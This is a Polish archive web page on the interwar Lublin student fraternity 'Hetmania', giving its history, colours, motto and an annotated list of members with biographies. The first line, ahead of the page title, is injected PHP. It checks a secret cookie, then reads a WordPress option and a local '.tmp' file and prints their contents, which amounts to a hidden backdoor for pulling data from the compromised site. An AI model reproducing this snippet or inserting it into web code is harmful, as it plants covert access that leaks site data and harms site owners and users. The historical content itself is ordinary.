if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Hetmania

Dekiel Hetmanii - vide Poszukiwania. Nazwa:
Polska Korporacja Akademicka “Hetmania”
Siedziba:
Lublin
Data powstania:
koniec 1926 r.
Barwy:
ciemnoszafirowa - srebrna - karmazynowa
Dewiza:
„Dla Ciebie Polsko i dla Twojej chwały”

Rys historyczny

Karta z albumu w barwach Hetmanii i fotografią z poświęcenia sztandaru Korporacji, dziedziniec KUL, Lublin 30 IV 1933 r.

Hetmanię założyło w końcu 1926 r. 18 studentów Uniwersytetu. Powstała z inicjatywy prof. Bronisława Buffała i ówczesnego prezesa K! Concordia Andrzeja Grajnerta. Dnia 10 V 1927 r. wniesiono do Senatu Uniwersytetu podanie o legalizację statutu. Pierwszym kuratorem Korporacji został prof. Zdzisław Papierkowski.

Okładka zaproszenia na uroczystości X-lecia Hetmanii, Lublin 29-30 I 1933 r.

Od dnia 25 (23?) 1927 r. należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 25 (23?) V 1927 r.). Kandydowała pod opieką K! Concordia. Prawa członka rzeczywistego uzyskała w 1929 r. (8 XII 1928 r.?). W latach 1933-1938 pozostawała poza strukturami Związku (?). W końcu lat 30-tych istniał Związek Filistrów.

Komers X-lecia Hetmanii, Lublin 30 I 1938 r.

Całkowita ustalona, imienna lista członków obejmuje 70 osób, w tym trzech członków honorowych.

Brak wiadomości o działalności Korporacji i spotkaniach członków w czasie wojny i w okresie powojennym.

Lista członków

Poniższa, niekompletna lista członków Hetmanii obejmuje 70 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Władysław Kamiński, dr, Filister honorowy Hetmanii

  Zdzisław Papierkowski, 1938 r.

 2. Zdzisław Papierkowski, (29 marca 1903 - 18 listopada 1980 w Lublinie), student Wydziału Prawa UJK 1921-25, mgr prawa; dr prawa UJK 1927, habilitacja UJK 1933 w zakresie postępowania karnego, od 1924 asystent UJK, docent, a później prof. nadzw. UJK 1937-39, jednocześnie docent, a następnie prof. nadzw. 1937-39 na Wydziale Prawa i Nauk Społeczno-Ekonomicznych UL/KUL, Filister honorowy Hetmanii, po wojnie prof. KUL 1944-73, dziekan Wydziału Prawa i Nauk Społeczno-Ekonomicznych 1944-46 (vide Grażyna Karolewicz, Nauczyciele akademiccy KUL w okresie międzywojennym. Biogramy, z. 2, Lublin 1996)

  Antoni Songajłło (?), 1933 r.

 3. Antoni Songajłło, (1875 - ), duchowny katolicki wyświęcony 1905, wieloletni proboszcz i katecheta w Archangielsku 1909-26, prowadził wykłady zlecone z liturgiki wschodniej na Wydziale Teologicznym KUL 1930-33, jednocześnie wykładowca w Instytucie Misyjnym 1930-33, ks. kanonik, prof. KUL, od 1931 Filister honorowy Hemtanii (vide Grażyna Karolewicz, Nauczyciele akademiccy KUL w okresie międzywojennym. Biogramy, z. 2, Lublin 1996)

Członkowie rzeczywiści

  Jan Balcer, 1939 r.

 1. Jan Balcer, (21 lutego 1905 w Lublinie - 1940 w Kalininie) s. Tomasza i Anny z Zaniów, absolwent Gimnazjum Koedukacyjnego Jana Kurtza w Lubartowie 1926, student i absolwent prawa KUL 1927-33, ppor. rez. 7 Pułku Piechoty Legionów w Chełmie, po studiach w Policji Państwowej, podkomisarz Wydziału Śledczego w Białymstoku, w niewoli sowieckiej, zamordowany przez NKWD

  Baranowski, 1938 r.

 2. Henryk Baranowski,

 3. Marian Sas-Bojarski, ( - ok. 24 V 1928) zginął tragicznie

  Bolechowski, 1934 r.

 4. Bolechowski,

  Jerzy Borzduch, 1935 r.

 5. Jerzy Borzduch, olderman sem. let. 1937/38

  Stefan Brachowski, 1938 r.

 6. Stefan Brachowski, olderman 1931/32

  Chłystowski, 1938 r.

 7. Antoni Chłystowski, olderman sem. zim. 1937/38 (Prezydium X-lecia)

  Chrościkowski, 1938 r.

 8. Zygmunt Chróścikowski,

 9. Henryk Cybulski

  Czerniewski, 1934 r.

 10. Czerniewski,

 11. Marian Daniel
 12. Michał Dawid, założyciel Hetmanii 1926

  Bolesław Domagalski, 1938 r.

 13. Bolesław Domagalski, skarb. sem. let. 1937/38, prawnik, adwokat w Lublinie, członek chóru “Echo”

  Leopold Dragański, 1938 r.

 14. Leopold Dragański, sekretarz sem. let. 1936/37, sekretarz sem. zim. 1937/38 (Prezydium X-lecia)

  Adam Gajewski, 1938 r.

 15. Adam Gajewski, (17 września 1909 w Lublinie - 5 kwietnia 1972 w Gdańsku) s. Franciszka Karola i Jadwigi Stefanii z d. Ponińska, absolwent Gimnazjum im. Stanisława Staszica w Lublinie oraz prawa KUL, prezes 1931/32, odbył Dywizyjny Kurs Podchorążych Rezerwy przy 13 Dywizji Piechoty w Równem na Wołyniu, ppor. rez. 1935, walczył w wojnie obronnej 1939, wzięty do niewoli 19 września 1939 k/Zdołbunowa, po ucieczce w konspiracji w NOW, a następnie AK, trzykrotnie aresztowany przez Gestapo, w 1943 zdał egzamin adwokacki, sędzia wojskowy 1945/46, od 1948 prowadził kancelarię adwokacką w Sopocie, po jej likwidacji w dyspozycji Rady Adwokackiej w Gdańsku, pracował do śmierci jako radca prawny w przedsiębiorstwach państwowych, pochowany w Gdańsku-Oliwie przy katedrze oliwskiej

 16. Antoni Górka, olderman sem. let. 1936/37
 17. Julian Golonka, skarbnik sem. let. 1927/28, delegat na IX Zjazd ZPKA
 18. Seweryn Gregorowicz, prezes sem. let. 1936/37

  Jedynak, 1938 r.

 19. Jedynak, Filister “ojciec Hetmanii”

 20. Mieczysław Kochman
 21. Józef Kostkowski, założyciel Hetmanii 1926, sekretarz sem. let. 1927/28

  Jan Kowalski, 1934 r.

 22. Jan Kowalski,

 23. Stanisław Kowalski, założyciel Hetmanii 1926, wiceprezes sem. let. 1927/28, członek komitetu red. “Wiadomości Korporacyjnych” 1928,

  Kozłowski, 1938 r.

 24. Kazimierz Kozłowski, Filister “ojciec Hetmanii”

  Anatol Kruszyński, 1939 r.

 25. Anatol Kruszyński, (14 maja 1908 w Ozarzycach w Rosji - 1940 w Katyniu), s. Franciszka i Aleksandry z Pieńkowskich, student i absolwent 1934 prawa KUL, prezes sem. let. 1933/34, absolwent Szkoły Podchorążych Rezerwy Piechoty w Biedrusku 1930, ppor. rez., przydzielony do 7 Pułku Piechoty Legionów z Chełmna, w niewoli sowieckiej, zamordowany w Katyniu

 26. Antoni Kwietniewski, założyciel Hetmanii 1926

  Eugeniusz Litwiński, 1938 r.

 27. Eugeniusz Litwiński, brat Marka (Polesia), założyciel Hetmanii 1926, pierwszy prezes 1926, prezes sem. let. 1927/28

  Zdzisław Lizut, 1934 r.

 28. Zdzisław Lizut, (1909 - lata 90-te) wiceprezes sem. let. 1933/34

  Łosakiewicz, 1938 r.

 29. Bolesław Łosakiewicz,

 30. Ryszard Łoskiewicz

  Łysakowski, 1938 r.

 31. Łysakowski,

 32. Ryszard Migurski,
 33. . J. Młodecki

  Henryk Mogilnicki, 1938 r.

 34. Henryk Mogilnicki, sekretarz 1931/32, prawnik, sędzia

 35. Jerzy Olszewski
 36. Józef Olszewski

  Ludwik Pade, 15 II 1930 r.

 37. Ludwik Pade,

  Petelczyc, 1938 r.

 38. Wacław Petelczyc,

  Jan Piaskowski, 1929 r.

 39. Jan Piaskowski prawd. członek prezydium 1929

  Stanisław Pinkiewicz, 1938 r.

 40. Stanisław Pinkiewicz, sekretarz sem. let. 1933/34, prezes sem. zim. 1937/38 (Prezydium X-lecia), mgr

  Stanisław Prośba, 1929 r.

 41. Stanisław Prośba, prawd. członek prezydium 1929

  Witold Przeciechowski, 1938 r.

 42. Witold Przeciechowski, (1912/16 - 1976) prezes sem. let. 1937/38

  Leon Romański, 1931 r.

 43. Leon Romański, (1910-1990) wiceprezes 1931/32, prawnik, prokurator w Lublinie

  Rudnicki, 1938 r.

 44. Zygmunt Rudnicki,

  Rydzyński, 1938 r.

 45. Rydzyński,

  Stanisław Ryszko, 1938 r.

 46. Stanisław Ryszko, wiceprezes sem. let. 1937/38

 47. Roman Rytel, założyciel Hetmanii 1926

  Sadownik, 1938 r.

 48. Sadownik, c. 1938 (?)

 49. Wojciech Sankowski, olderman sem. let. 1927/28
 50. Roman Sienkiewicz

  Gabriel Siudak, 1929 r.

 51. Gabriel Siudak, prawd. członek prezydium 1929

 52. Zdzisław Skierkowski

  Jerzy Skorżyński, 1934 r.

 53. Jerzy Skorżyński, (1913-1989) prawnik, adwokat, dziekan Rady Adwokackiej w Radomiu

  Staszewski, 1938 r.

 54. Staszewski, filister 1938

  Staszewski, 1938 r.

 55. Staszewski, c. 1938 (?)

 56. Edmund Stelmaszczuk, założyciel Hetmanii 1926

  Suchański, 1938 r.

 57. Suchański, c. 1938 (?), fuksmajor 1938

 58. Jan Supryn, założyciel Hetmanii 1926

  Tadeusz Szkutnik, 1931 r.

 59. Tadeusz Szkutnik, akt. 1931

  Jan Szociński, lata studiów.

 60. Jan Szociński, (28 kwietnia 1902 w Urzędowie - 6 maja 1975 w Wałczu) s. Mikołaja (rolnika) i Wiktorii z Gajewskich, jako 16-latek brał udział w rozbrajaniu garnizonu austriackiego w Kraśniku 1918, a nstępnie wstąpił do WP, walczył w obronie Lwowa 1919 i wojnie 1920, absolwent Gimnazjum Polskiej Macierzy Szkolnej w Janowie Lubelskim i Szkoły Podchorążych Rezerwy Piechoty nr w 9 Berezie Kartuskiej 1927-28, student i absolwent prawa KUL 1926-32, sędzia sądów grodzkich w Krzemieńcu i Sarnach na Wołyniu, w wojnie obronnej 1939 por. piechoty 8 Pułku Piechoty Legionów, walczył pod Iłżą, od 1940 w konspiracji w ZWZ, a następnie w Batalionach Chłopskich, awansowny przez KG BCh do stopnia majora, zastępca delgata rządu w powiecie kraśnickim, po wojnie organizator sądownictwa na terenie byłych Prus Wschodnich, sędzia w Bartoszycach, na przełomie 1945/46 osiadł w Wałczu, sędzia Sądu Okręgowego, po zwolnieniu od 1954 do śmierci radca prawny różnych wałeckich przedsiębiorstw, pochowany w Wałczu [Źródła (poza wskazanymi poniżej spisu członków): relacja wnuka Pawła Ignatowicza]

  Józef Wesołowski, 1938 r.

 61. Józef Wesołowski, wiceprezes sem. let. 1936/37 oraz sem. zim. 1937/38 (Prezydium X-lecia), po wojnie ksiądz katolicki, proboszcz na Lubelszczyźnie

 62. Mieczysław Wesołowski, (11 listopada 1911 w Bychawie pow. Lublin - 12 grudnia 1941 w Auschwitz) student i absolwent prawa 1934 KUL (mgr praw), aplikant adwokacki, oficer rez. 13 Dywizji Piechoty w Równem, szef wydziału organizacyjnego NOW, aresztowany przez Gestapo w czerwcu 1940 i osadzony na Zamku Lubelskim, wywieziony 14 października 1941 do Auschwitz, tam zamordowany

  Adam Wilczyński, 1938 r.

 63. Adam Wilczyński, skarbnik sem. let. 1936/37, sekretarz sem. let. 1937/38

  Iwo Wilkoński, 1938 r.

 64. Iwo Wilkoński, (17 stycznia 1910 w Szpondowie w pow. płońskim - 25 maja 1971 w Słupsku) herbu Odrowąż, s. Stefana (Arkonia) i Janiny Nepomuceny z d. Baniewicz, student i absolwent prawa KUL, w czasie wojny przebywał w Górznie, po wojnie adwokat w Słupsku, członek Izby Adwokackiej w Gdańsku, a następnie w Szczecinie, wieloletni radca prawny Słupskich Zakładów Gastronomicznych, działacz ZHP, komendant hufca w Słupsku, pochowany na Starym Cmentarzu przy ul. Kaszubskiej w Słupsku (kw. 5, rz. 1, m. 25) [Źródła (poza wskazanymi poniżej spisu członków): relacja Mirosława Paliszewskiego, Andrzej Obecny, Iwo Wilkoński (1910-1971), Moje Miasto 2013, nr 13 (239) z 28 stycznia 2013, http://www.mojemiasto.slupsk.pl/index.php?id=5981 (stan 12 I 2014)]

 65. Tadeusz Wiśniowiecki, założyciel Hetmanii 1926, dyrektor Banku w Lubartowie, żołnierz II Korpusu PSZ gen. Władysława Andersa

  Piotr Wohlman, 1929 r.

 66. Piotr Wohlman, prawd. członek prezydium 1929

  Wróblewski, 1938 r.

 67. Wróblewski,

 68. Kazimierz Zduński

Listę członków opracowano na podstawie:

1) Zbysław Popławski, Polska Korporacja Akademicka “Hetmania” w Lublinie, maszynopis,
2) innych materiałów archiwalnych z Archiwum Korporacyjnego,
3) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Hetmania.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 23 VII 2010 r.
Ostania zmiana: 28 VI 2018 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Polska Korporacja Akademicka “Hetmania” (Lublin), (na:) www.archiwumkorporacyjne.pl, stan 28 VI 2018 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }